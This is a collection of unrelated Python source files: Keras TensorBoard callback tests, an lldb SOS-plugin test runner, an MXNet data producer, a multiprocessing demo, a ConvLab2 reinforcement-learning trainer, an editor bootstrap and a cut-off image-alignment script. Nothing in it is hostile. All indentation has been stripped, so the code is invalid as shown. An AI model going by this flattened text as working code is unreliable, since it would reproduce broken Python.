self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.train_dir))
# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there is some interval between file creations.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Ensure there is some interval between file creations.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
checkpoint_management.update_checkpoint_state_internal(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warn') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warn') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
assert len(files) == 1, 'Expected exactly one event file in logdir, found: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
|
test_libsosplugin.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
from __future__ import print_function
import unittest
import argparse
import re
import tempfile
import subprocess
import threading
import os
import sys
import inspect
lldb = ''
logfiledir = ''
host = ''
plugin = ''
assembly = ''
fail_flag = ''
fail_flag_lldb = ''
summary_file = ''
timeout = 0
regex = ''
repeat = 0
tests_failed = False
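# The globals above are placeholders; they are populated from the command-line
# arguments parsed in the __main__ block at the bottom of this file.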
def runWithTimeout(cmd):
# Keep the Popen handle at module scope so both the nested run() below and
# the timeout path in this function refer to the same object.
global p
p = None
def run():
global p
p = subprocess.Popen(cmd, shell=True)
p.communicate()
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
with open(summary_file, 'a+') as summary:
print('Timeout!', file=summary)
p.kill()
thread.join()
class TestSosCommands(unittest.TestCase):
def do_test(self, command):
global tests_failed
open(fail_flag, 'a').close()
try:
os.unlink(fail_flag_lldb)
except:
pass
logfile = os.path.join(logfiledir, command)
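# Build a single lldb batch invocation: load the SOS plugin, run the named
# test routine through testutils, and track failures with two flag files.
# fail_flag is created above and is expected to be removed by the test script
# on success; fail_flag_lldb is only created by the -k crash handler if lldb
# itself aborts.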
cmd = (('%s -b ' % lldb) +
("-k \"script open('%s', 'a').close()\" " % fail_flag_lldb) +
("-k 'quit' ") +
("--no-lldbinit ") +
("-o \"version\" ") +
("-O \"plugin load %s \" " % plugin) +
("-o \"script import testutils as test\" ") +
("-o \"script test.fail_flag = '%s'\" " % fail_flag) +
("-o \"script test.summary_file = '%s'\" " % summary_file) +
("-o \"script test.run('%s', '%s')\" " % (assembly, command)) +
("-o \"quit\" ") +
(" -- %s %s > %s.log 2>&1" % (host, assembly, logfile)))
runWithTimeout(cmd)
if not os.path.isfile(fail_flag):
tests_failed = True
if not os.path.isfile(fail_flag_lldb):
tests_failed = True
self.assertFalse(os.path.isfile(fail_flag))
self.assertFalse(os.path.isfile(fail_flag_lldb))
try:
os.unlink(fail_flag)
except:
pass
try:
os.unlink(fail_flag_lldb)
except:
pass
def t_cmd_bpmd_nofuturemodule_module_function(self):
self.do_test('t_cmd_bpmd_nofuturemodule_module_function')
def t_cmd_bpmd_module_function(self):
self.do_test('t_cmd_bpmd_module_function')
def t_cmd_bpmd_module_function_iloffset(self):
self.do_test('t_cmd_bpmd_module_function_iloffset')
def t_cmd_bpmd_methoddesc(self):
self.do_test('t_cmd_bpmd_methoddesc')
def t_cmd_bpmd_clear(self):
self.do_test('t_cmd_bpmd_clear')
def t_cmd_bpmd_clearall(self):
self.do_test('t_cmd_bpmd_clearall')
def t_cmd_clrstack(self):
self.do_test('t_cmd_clrstack')
def t_cmd_clrthreads(self):
self.do_test('t_cmd_clrthreads')
def t_cmd_clru(self):
self.do_test('t_cmd_clru')
def t_cmd_dumpclass(self):
self.do_test('t_cmd_dumpclass')
def t_cmd_dumpheap(self):
self.do_test('t_cmd_dumpheap')
def t_cmd_dumpil(self):
self.do_test('t_cmd_dumpil')
def t_cmd_dumplog(self):
self.do_test('t_cmd_dumplog')
def t_cmd_dumpmd(self):
self.do_test('t_cmd_dumpmd')
def t_cmd_dumpmodule(self):
self.do_test('t_cmd_dumpmodule')
def t_cmd_dumpmt(self):
self.do_test('t_cmd_dumpmt')
def t_cmd_dumpobj(self):
self.do_test('t_cmd_dumpobj')
def t_cmd_dumpstack(self):
self.do_test('t_cmd_dumpstack')
def t_cmd_dso(self):
self.do_test('t_cmd_dso')
def t_cmd_eeheap(self):
self.do_test('t_cmd_eeheap')
def t_cmd_eestack(self):
self.do_test('t_cmd_eestack')
def t_cmd_gcroot(self):
self.do_test('t_cmd_gcroot')
def t_cmd_ip2md(self):
self.do_test('t_cmd_ip2md')
def t_cmd_name2ee(self):
self.do_test('t_cmd_name2ee')
def t_cmd_pe(self):
self.do_test('t_cmd_pe')
def t_cmd_histclear(self):
self.do_test('t_cmd_histclear')
def t_cmd_histinit(self):
self.do_test('t_cmd_histinit')
def t_cmd_histobj(self):
self.do_test('t_cmd_histobj')
def t_cmd_histobjfind(self):
self.do_test('t_cmd_histobjfind')
def t_cmd_histroot(self):
self.do_test('t_cmd_histroot')
def t_cmd_sos(self):
self.do_test('t_cmd_sos')
def t_cmd_soshelp(self):
self.do_test('t_cmd_soshelp')
def generate_report():
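# Summarizes the per-suite results recorded in summary_file. Recognized line
# prefixes are: 'new_suite: <name>' (start of a suite), 'True'/'False'
# (passed/failed checks), 'Completed!'/'Timeout!' (suite status), and
# '!!! ' (failure messages to echo).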
report = [{'name': 'TOTAL', True: 0, False: 0, 'completed': True}]
fail_messages = []
if not os.path.isfile(summary_file):
print('No summary file to process!')
return
with open(summary_file, 'r') as summary:
for line in summary:
if line.startswith('new_suite: '):
report.append({'name': line.split()[-1], True: 0, False: 0,
'completed': False, 'timeout': False})
elif line.startswith('True'):
report[-1][True] += 1
elif line.startswith('False'):
report[-1][False] += 1
elif line.startswith('Completed!'):
report[-1]['completed'] = True
elif line.startswith('Timeout!'):
report[-1]['timeout'] = True
elif line.startswith('!!! '):
fail_messages.append(line.rstrip('\n'))
for suite in report[1:]:
report[0][True] += suite[True]
report[0][False] += suite[False]
report[0]['completed'] &= suite['completed']
for line in fail_messages:
print(line)
print()
print('=' * 79)
print('{:72} {:6}'.format('Test suite', 'Result'))
print('-' * 79)
for suite in report[1:]:
if suite['timeout']:
result = 'Timeout'
elif suite[False]:
result = 'Fail'
elif not suite['completed']:
result = 'Crash'
elif suite[True]:
result = 'Success'
else:
result = 'Please, report'
print('{:68} {:>10}'.format(suite['name'], result))
print('=' * 79)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--lldb', default='lldb')
parser.add_argument('--host', default='.')
parser.add_argument('--plugin', default='.')
parser.add_argument('--logfiledir', default='.')
parser.add_argument('--assembly', default='Test.exe')
parser.add_argument('--timeout', default=90)
parser.add_argument('--regex', default='t_cmd_')
parser.add_argument('--repeat', default=1)
parser.add_argument('unittest_args', nargs='*')
args = parser.parse_args()
lldb = args.lldb
host = args.host
plugin = args.plugin
logfiledir = args.logfiledir
assembly = args.assembly
timeout = int(args.timeout)
regex = args.regex
repeat = int(args.repeat)
print("host: %s" % host)
print("lldb: %s" % lldb)
print("lldb plugin: %s" % plugin)
print("logfiledir: %s" % logfiledir)
print("assembly: %s" % assembly)
print("timeout: %i" % timeout)
print("regex: %s" % regex)
print("repeat: %i" % repeat)
if os.name != 'posix':
print('OS not supported')
exit(1)
fail_flag = os.path.join(logfiledir, 'fail_flag')
fail_flag_lldb = os.path.join(logfiledir, 'fail_flag.lldb')
print("fail_flag: %s" % fail_flag)
print("fail_flag_lldb: %s" % fail_flag_lldb)
summary_file = os.path.join(logfiledir, 'summary')
print("summary_file: %s" % summary_file)
try:
os.unlink(summary_file)
except:
pass
sys.argv[1:] = args.unittest_args
suite = unittest.TestSuite()
# On Python 3, methods looked up on the class are plain functions, so accept both.
all_tests = inspect.getmembers(
    TestSosCommands,
    predicate=lambda m: inspect.isfunction(m) or inspect.ismethod(m))
for (test_name, test_func) in all_tests:
if re.match(regex, test_name):
suite.addTest(TestSosCommands(test_name))
unittest.TextTestRunner(verbosity=1).run(suite)
generate_report()
if tests_failed:
exit(1)
|
InferenceDataProducer.py
|
import numpy as np
from threading import Thread
try:
    from Queue import Queue  # Python 2
except ImportError:
    from queue import Queue  # Python 3
from PIL import Image
import os
import mxnet as mx
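# Produces images (and optional ground-truth masks) for multi-scale
# segmentation inference. Two daemon threads feed bounded queues so that
# decoding and preprocessing overlap with network execution.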
class InferenceDataProducer(object):
def __init__(self,
im_root,
mask_root,
flist_path,
scale_list,
rgb_mean=(128, 128, 128),
data_queue_size=100):
self.flist = None
self.im_root = im_root
self.mask_root = mask_root
self._load_flist(flist_path)
self.scale_list = scale_list
self.data_num = self.get_data_num()
self.avail_data_num = self.data_num
self.cursor = 0
self.rgb_mean = mx.nd.array(rgb_mean, dtype=np.float32, ctx=mx.cpu()).reshape((1, 1, 3))
self.flist_item_queue = Queue(maxsize=1000)
list_producer = Thread(target=self._produce_flist_item)
list_producer.daemon = True
list_producer.start()
self.data_queue = Queue(maxsize=data_queue_size)
producer = Thread(target=self._produce_data)
producer.daemon = True
producer.start()
def _produce_flist_item(self):
while True:
if self.cursor + 1 <= self.data_num:
file = self.flist[self.cursor]
self.flist_item_queue.put(file)
self.cursor += 1
else:
return
def _produce_data(self):
while True:
flist_item = self.flist_item_queue.get()
value = self._process_data(flist_item)
if value is not None:
self.data_queue.put(value)
else:
raise AssertionError("file error: %s"%flist_item[0])
def _process_data(self, item):
buf = mx.nd.array(np.frombuffer(open(item[0], 'rb').read(), dtype=np.uint8), dtype=np.uint8, ctx=mx.cpu())
orig_im = mx.image.imdecode(buf)
h, w = orig_im.shape[:2]
im_list = []
for s in self.scale_list:
tmp_im = mx.image.imresize(orig_im, int(w * s), int(h * s), interp=1)
tmp_im = tmp_im.astype(np.float32)
tmp_im -= self.rgb_mean
tmp_im = mx.nd.transpose(tmp_im, [2, 0, 1])
tmp_im = mx.nd.expand_dims(tmp_im, 0)
im_list.append(tmp_im)
if item[1] is None:
l_arr = np.zeros((h, w), dtype=np.uint8)
else:
l = Image.open(item[1])
l_arr = np.array(l, dtype=np.uint8)
return (im_list, l_arr, item[2], orig_im)
def get_data(self):
if self.avail_data_num>0:
self.avail_data_num -= 1
data = self.data_queue.get()
return data
else:
return None
def get_data_num(self):
return len(self.flist)
def _load_flist(self,
flist_path):
with open(flist_path) as f:
lines = f.readlines()
self.flist = []
for line in lines:
if len(line.rstrip()) == 0:
continue
item = self._parse_flist_item(line.rstrip())
self.flist.append(item)
self.data_num = len(self.flist)
def _parse_flist_item(self, line):
item_name = line
im_name = item_name+".jpg"
im_path = os.path.join(self.im_root, im_name)
l_path = None
if os.path.exists(os.path.join(self.mask_root, item_name+".png")):
l_path = os.path.join(self.mask_root, item_name+".png")
return (im_path, l_path, item_name)
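def _example_usage():
    """Minimal usage sketch (illustrative only; the paths and scale list below are
    hypothetical and not part of the original module)."""
    producer = InferenceDataProducer(im_root="data/images",
                                     mask_root="data/masks",
                                     flist_path="data/val.lst",
                                     scale_list=[0.75, 1.0, 1.25])
    while True:
        item = producer.get_data()
        if item is None:
            break
        im_list, label, name, orig_im = item
        # run the network on every scale in im_list and fuse the predictions here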
|
multi_process.py
|
# runs in parallel
import time
import math
from multiprocessing import Process
NUM_PROCESSES = 4
def calc(num_elements):
res = 0
for i in range(num_elements):
res += math.sqrt(i)
print(res)
def main():
processes = []
for _ in range(NUM_PROCESSES):
processes.append(Process(target=calc, args=[8_000_000]))  # hand the task over to the process
start_time = time.perf_counter()
for process in processes:
process.start()
for process in processes:
process.join()  # wait for the processes to finish
end_time = time.perf_counter()
print("Took: {} s".format(end_time - start_time))
if __name__ == "__main__":
main()
|
train.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 31 10:57:51 2019
@author: truthless
"""
import numpy as np
import torch
from torch import multiprocessing as mp
from convlab2.dialog_agent.agent import PipelineAgent
from convlab2.dialog_agent.env import Environment
from convlab2.dst.rule.multiwoz import RuleDST
from convlab2.policy.rule.multiwoz import RulePolicy
from convlab2.policy.gdpl import GDPL
from convlab2.policy.gdpl import RewardEstimator
from convlab2.policy.rlmodule import Memory, Transition
from argparse import ArgumentParser
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
try:
mp = mp.get_context('spawn')
except RuntimeError:
pass
def sampler(pid, queue, evt, env, policy, batchsz):
"""
This is a sampler function, and it will be called by multiprocess.Process to sample data from environment by multiple
processes.
:param pid: process id
:param queue: multiprocessing.Queue, to collect sampled data
:param evt: multiprocessing.Event, to keep the process alive
:param env: environment instance
:param policy: policy network, to generate action from current policy
:param batchsz: total sampled items
:return:
"""
buff = Memory()
# we need to sample batchsz of (state, action, next_state, reward, mask)
# each trajectory contains `trajectory_len` num of items, so we only need to sample
# `batchsz//trajectory_len` num of trajectory totally
# the final sampled number may be larger than batchsz.
sampled_num = 0
sampled_traj_num = 0
traj_len = 50
real_traj_len = 0
while sampled_num < batchsz:
# for each trajectory, we reset the env and get initial state
s = env.reset()
for t in range(traj_len):
# [s_dim] => [a_dim]
s_vec = torch.Tensor(policy.vector.state_vectorize(s)[0])
a = policy.predict(s)
# interact with env
next_s, _, done = env.step(a)
# a flag indicates ending or not
mask = 0 if done else 1
# get reward compared to demonstrations
next_s_vec = torch.Tensor(policy.vector.state_vectorize(next_s)[0])
# save to queue
buff.push(s_vec.numpy(), policy.vector.action_vectorize(a), 0, next_s_vec.numpy(), mask)
# update per step
s = next_s
real_traj_len = t
if done:
break
# this is end of one trajectory
sampled_num += real_traj_len
sampled_traj_num += 1
# t indicates the valid trajectory length
# this is end of sampling all batchsz of items.
# when sampling is over, push all buff data into queue
queue.put([pid, buff])
evt.wait()
def sample(env, policy, batchsz, process_num):
"""
Given a total of batchsz items to sample, the work is split equally across the processes;
when all processes return, their data are merged and returned as one batch.
:param env:
:param policy:
:param batchsz:
:param process_num:
:return: batch
"""
# batchsz will be split across the processes,
# so the final number of sampled items may be larger than the batchsz parameter
process_batchsz = np.ceil(batchsz / process_num).astype(np.int32)
# buffer to save all data
queue = mp.Queue()
# start processes for pid in range(1, processnum)
# if processnum = 1, this part will be ignored.
# when save tensor in Queue, the process should keep alive till Queue.get(),
# please refer to : https://discuss.pytorch.org/t/using-torch-tensor-over-multiprocessing-queue-process-fails/2847
# however still some problem on CUDA tensors on multiprocessing queue,
# please refer to : https://discuss.pytorch.org/t/cuda-tensors-on-multiprocessing-queue/28626
# so just transform tensors into numpy, then put them into queue.
evt = mp.Event()
processes = []
for i in range(process_num):
process_args = (i, queue, evt, env, policy, process_batchsz)
processes.append(mp.Process(target=sampler, args=process_args))
for p in processes:
# set the process as daemon, and it will be killed once the main process is stopped.
p.daemon = True
p.start()
# we need to get the first Memory object and then merge the other Memory objects into it using its append function.
pid0, buff0 = queue.get()
for _ in range(1, process_num):
pid, buff_ = queue.get()
buff0.append(buff_) # merge current Memory into buff0
evt.set()
# now buff saves all the sampled data
buff = buff0
return buff.get_batch()
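# Worked example of the split (numbers are illustrative): with batchsz=1024 and
# process_num=8, each worker is asked for ceil(1024 / 8) = 128 items, so the merged
# buffer holds at least 1024 transitions; it can be slightly larger because every
# worker finishes its last trajectory before stopping.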
def update(env, policy, batchsz, epoch, process_num, rewarder):
# sample data asynchronously
batch = sample(env, policy, batchsz, process_num)
# data in batch is : batch.state: ([1, s_dim], [1, s_dim]...)
# batch.action: ([1, a_dim], [1, a_dim]...)
# batch.reward/ batch.mask: ([1], [1]...)
s = torch.from_numpy(np.stack(batch.state)).to(device=DEVICE)
a = torch.from_numpy(np.stack(batch.action)).to(device=DEVICE)
next_s = torch.from_numpy(np.stack(batch.next_state)).to(device=DEVICE)
mask = torch.Tensor(np.stack(batch.mask)).to(device=DEVICE)
batchsz_real = s.size(0)
policy.update(epoch, batchsz_real, s, a, next_s, mask, rewarder)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument("--load_path", type=str, default="", help="path of model to load")
parser.add_argument("--batchsz", type=int, default=1024, help="batch size of trajactory sampling")
parser.add_argument("--epoch", type=int, default=20, help="number of epochs to train")
parser.add_argument("--process_num", type=int, default=8, help="number of processes of trajactory sampling")
args = parser.parse_args()
# simple rule DST
dst_sys = RuleDST()
policy_sys = GDPL(True)
policy_sys.load(args.load_path)
rewarder = RewardEstimator(policy_sys.vector, False)
# not use dst
dst_usr = None
# rule policy
policy_usr = RulePolicy(character='usr')
# assemble
simulator = PipelineAgent(None, None, policy_usr, None, 'user')
env = Environment(None, simulator, None, dst_sys)
for i in range(args.epoch):
update(env, policy_sys, args.batchsz, i, args.process_num, rewarder)
|
boot.py
|
#standard simulator bootstrap
#from wx.core import Sleep
import q3
import q3.config
import q3.Timer as Timer
from q3.ui.engine import qtw,qtc,qtg
import threading
import os
keys = globals().keys()
runApp = False
if False and not 'c' in keys:
c = None
class encImpl(qtc.QThread):
def __init__(self):
self._c = None
self._initialized = False
super(encImpl, self).__init__()
def run(self):
while (not self._initialized):
Timer.sleepMs(0)
pass
#exec(open("./../../editor.py").read())
#g = console.newConsoleWidget
tg = threading.Thread(target=tga.run)
#t = qtc.QThread(tg.main)
#t.daemon = True
#tg.finished.connect(app.exit)
tg.start()
c = tg._c
runApp = True
#c.registerCommand('rc',c.registerCommand)
cPath = os.path.dirname(os.path.realpath(__file__))+'/'
#cPath=dirPath+'/../' #'/src/makaronLab/q3/q3/'
class encImpl:
def __init__(self):
self._namespace = None
self._initialized = False
def run(self):
self.process(self._namespace)
def process(self, _namespace):
print('Hello world')
exec(open(cPath+"regCommands.py").read())
self._initialized = True
#exec(open("/src/makaronLab/q3/q3/bootstrap/startup.py").read())
app = q3.App(q3Impl=q3.consts.Q3_IMPL)
frm = q3.EditorFrame(app, title='makaronLab')
q3.config.consoleInstance = frm.console()
c = frm.console()
q3.config.consoleWidgetInstance = frm.consoleWidget()
cw = frm.consoleWidget()
tga = encImpl()
tga._namespace = frm.consoleNamespace()
#self._initialized = True
tg = threading.Thread(target=tga.run)
tg.start()
while (not tga._initialized):
Timer.sleepMs(0)
#frm.console().registerCommand('execF',execF,True)
fileName = cPath+"beforeShow.py"
s=c.execF(fileName)
#cw.write(repr(s.getvalue()) + '\n')
cw.write('\n===bootstrap/beforeShow.py:\n'+s + '\n')
#why not register execF as Function ?
frm.Show()
#run "afterShow" in separate thread
''' # moved to test 2
class enc2Impl:
def __init__(self):
self._namespace = None
self._initialized = False
def run(self):
fileName = cPath+"bootstrap/afterShow.py"
s=execF(fileName)
#cw.write(repr(s.getvalue()) + '\n')
cw.write('\n===bootstrap/afterShow.py:\n'+s + '\n')
self._initialized = True
qor = qtc.Qt.Orientation
tgb = enc2Impl()
tgb._namespace = frm.consoleNamespace()
th2 = threading.Thread(target=tgb.run)
th2.start()
# do not wait for this thread as it can be long ...
#while (not tgb._initialized):
# Timer.sleepMs(0)
# just keeping handle for frame in case of presenting something to user
frm._afterShowThread = th2
'''
fileName = cPath+"afterShow.py"
s=c.execF(fileName)
#cw.write(repr(s.getvalue()) + '\n')
cw.write('\n===bootstrap/afterShow.py:\n'+s + '\n')
#'''
#timer = qtc.QTimer()
#timer.timeout.connect(lambda: None)
#timer.start(100)
#app.timerr= timer
#globals()['frm0']=frm
#app.setQuitOnLastWindowClosed(False)
def except_hook(cls, exception, traceback):
sys.__excepthook__(cls, exception, traceback)
import sys
sys.excepthook = except_hook
app.MainLoop()
|
alignjoy.py
|
#!/usr/bin/env python
import os
import time
import shutil
import threading
class align():
def alinha_arquivos(self, name, images, cmdvel):
if os.path.isfile("../bag-files/joy/"+name):
diferenca_images = []
#images = [arq for arq in os.listdir("../bag-files/images")]
for img in sorted(images):
diferenca_images.append(abs(int(img[0:-5]) - int(name[0:-4])))
#print(int(img[0:-5]) - int(name[0:-4]))
if (int(img[0:-5]) - int(name[0:-4])) > 0:
break
if os.path.isfile("../bag-files/images/" + name[0:-4] + ".jpeg"):
shutil.copyfile("../bag-files/images/" + name[0:-4] + ".jpeg", "../bag-files/database_images/" + name[0:-4] + ".jpeg")
elif os.path.isfile("../bag-files/images/" + str(int(name[0:-4]) + int(sorted(diferenca_images)[0])) + ".jpeg"):
shutil.copyfile("../bag-files/images/" + str(int(name[0:-4]) + int(sorted(diferenca_images)[0])) + ".jpeg", "../bag-files/database_images/" + name[0:-4] + ".jpeg")
